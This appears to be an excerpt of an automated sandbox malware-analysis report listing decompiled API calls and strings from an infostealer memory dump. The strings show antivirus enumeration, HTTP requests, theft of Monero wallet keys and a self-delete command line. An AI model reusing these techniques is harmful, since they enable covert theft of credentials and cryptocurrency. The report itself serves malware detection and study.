                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406AED
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00406AF4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00406C12
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406C20
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00406C32
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406C40
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00406D87
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00406D95
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00406DED
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00406E12
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4187064601-0

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004087B1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408894
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408A01
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00408A08
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408B2B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408B39
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00408B4B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B59
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408C6C
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00408C7A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408CD2
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00408CF7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 156379684-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004107AB
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004107BB
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00426614), ref: 004107CC
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000), ref: 004107E6
                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00426614,00000000), ref: 0041081C
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00410877
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: CoCreateInstance.OLE32(004280A0,00000000,00000001,00426478,00000000,?), ref: 0041072C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysAllocString.OLEAUT32(00000000), ref: 0041073A
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: _wtoi64.MSVCRT ref: 0041077C
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysFreeString.OLEAUT32(?), ref: 00410791
                                                                                                                                                                                                                                                                    • Part of subcall function 0041070C: SysFreeString.OLEAUT32(00000000), ref: 00410794
                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004108AE
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?), ref: 004108BA
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00426614,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 004108C1
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00410903
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004108ED
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prologInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                  • API String ID: 3912155974-2016369993
                                                                                                                                                                                                                                                                  • Opcode ID: 48643999b10eee03f0c59d123a06e6169fae4428243e255b133bc3044fa8e62b
                                                                                                                                                                                                                                                                  • Instruction ID: fa5847169170d8b0e9c4b5122c5b556a2ea6954dfc20d5294fea3165d03c3ddc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48643999b10eee03f0c59d123a06e6169fae4428243e255b133bc3044fa8e62b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73415E71A01229BBDB20DB91DC49EEF7B7CFF49710F504016F605A6191D7B89581CBA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411899
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004118CA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00411962
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00411A19
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411A55
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411A9C
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411AE3
                                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00411B2A
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411C8D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                                  • API String ID: 49562497-2658103896
                                                                                                                                                                                                                                                                  • Opcode ID: 437d25f88f9aba824d7ebd3feacc4699e2d5c600ccbc7324c3f55a0d206d7008
                                                                                                                                                                                                                                                                  • Instruction ID: 46384a3b97a1bde4c4669e432c415db955f33f6cf372ed7ba0df213af631809c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 437d25f88f9aba824d7ebd3feacc4699e2d5c600ccbc7324c3f55a0d206d7008
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5C16EB1C0020DEFDF24EBA4D855EDE7BB9AF14308F10446EF515A7191EB389A89CB64
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00404F6D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404FD0
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404FE4
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405007
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 0040503D
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405061
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040506C
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040508A
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405110
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040511B
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405124
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040512D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                  • API String ID: 2435781452-2509457195
                                                                                                                                                                                                                                                                  • Opcode ID: 000bba3da9afd0714dec3e022a79a6def8987182737f21c0e5ca083b1abb64e0
                                                                                                                                                                                                                                                                  • Instruction ID: d4897b2415b3c0a6ddd8e2fd612fb6bd21709f0bfb2b25760a71d876596ed503
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 000bba3da9afd0714dec3e022a79a6def8987182737f21c0e5ca083b1abb64e0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C516BB590011DAFEB10EBA0DC85FEEBBB9EB05344F10407AF505B6181DB785A888BA5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004136DD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004136FD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413709
                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 0041371E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004138AA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004138B7
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004138C5
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004138D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                                  • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                                  • API String ID: 1312519015-206210831
                                                                                                                                                                                                                                                                  • Opcode ID: 6f9080cdc21e46a6c714ff01947ce3ed2e05a16bd0e7d648b2dbb08192df9983
                                                                                                                                                                                                                                                                  • Instruction ID: 1d590735ea8c28ab34f42f52d61139ed63d29c063289d3f0752b127fb499f175
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f9080cdc21e46a6c714ff01947ce3ed2e05a16bd0e7d648b2dbb08192df9983
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5141B1D0024CEACB01EBE5C985ADEBBB8AF15304F50007FA105B3182DB785B4CCB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00410934
                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410944
                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC), ref: 00410955
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(004282F0,00000000,00000001,00428220,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 0041096F
                                                                                                                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000), ref: 004109A5
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004109F4
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C73: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1A,?,?,00000000,?,Work Dir: In memory,00000000,?,004265FC,00000000,?,00000000), ref: 00410C7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00410C73: CharToOemW.USER32(?,00000000), ref: 00410C87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00410A28
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                  • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                  • API String ID: 3694693100-2776955613
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00401C70
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401C8E
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                                                                                    • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401E7F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401E9D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
